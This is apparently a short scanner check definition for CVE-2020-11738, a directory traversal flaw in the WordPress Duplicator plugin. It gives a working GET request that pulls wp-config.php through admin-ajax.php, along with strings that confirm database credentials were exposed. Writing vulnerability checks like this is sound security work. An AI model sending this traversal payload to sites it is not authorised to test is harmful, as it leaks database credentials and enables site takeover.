AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 4'
URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
METHOD='GET'
MATCH="DB_NAME|DB_USER|COLLATE"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'